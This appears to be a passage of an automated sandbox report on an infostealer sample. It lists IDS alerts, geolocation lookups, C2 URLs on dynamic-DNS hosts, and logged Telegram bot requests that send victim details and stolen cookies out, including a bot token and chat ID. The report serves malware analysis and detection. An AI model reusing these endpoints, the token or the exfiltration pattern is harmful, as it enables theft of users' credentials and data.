                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:55431 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:55420 -> 104.21.80.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:55414 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003222EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003222EE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd326c5f9c7285Host: api.telegram.orgContent-Length: 1279
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 00:27:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 00:28:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4526688861.0000000000434000.00000040.80000000.00040000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20a
                Source: RegSvcs.exe, 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000007.00000002.4529357872.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: ectosphere.exe, 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000007.00000002.4529357872.0000000003369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002D46000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4529175077.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.0000000003369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4532685097.0000000004313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RegSvcs.exe, 00000003.00000002.4532596106.0000000003C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RegSvcs.exe, 00000007.00000002.4529357872.00000000034E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000034DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55451 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55474 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55432 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55494
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55451
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55474
                Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55431
                Source: unknownNetwork traffic detected: HTTP traffic on port 55482 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55463 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55494 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55539
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55414
                Source: unknownNetwork traffic detected: HTTP traffic on port 55431 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55432
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55499
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55463
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55420
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55482
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 55443 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 55420 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55539 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 55499 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:55499 version: TLS 1.2
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00324164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00324164
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00324164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00324164
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00094164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00094164
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00323F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00323F66
